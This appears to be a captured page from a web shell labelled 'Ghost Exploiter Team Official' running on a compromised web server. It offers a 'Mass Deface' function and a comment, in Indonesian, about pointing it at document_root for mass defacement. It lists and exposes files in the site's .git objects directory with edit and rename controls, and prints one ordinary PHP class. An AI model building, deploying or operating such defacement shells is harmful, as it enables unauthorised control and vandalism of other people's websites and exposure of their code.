Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
.git
/
objects
/
ab
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
PaginationDto.php
0.244KB
edt
ren
Payment-20260128184329.php
7.176KB
edt
ren
Payment.php
7.176KB
edt
ren
PhpProcess.php
2.438KB
edt
ren
api.php
0KB
edt
ren
app.php
0KB
edt
ren
composer.json
1.513KB
edt
ren
index.html
0.435KB
edt
ren
stash
0.04KB
edt
ren
web.php
0.112KB
edt
ren
<?php declare(strict_types=1); namespace App\Responses; class PaginationDto extends Dto { public function __construct( public int $per_page, public ?string $next_cursor, public ?string $prev_cursor, ) { } }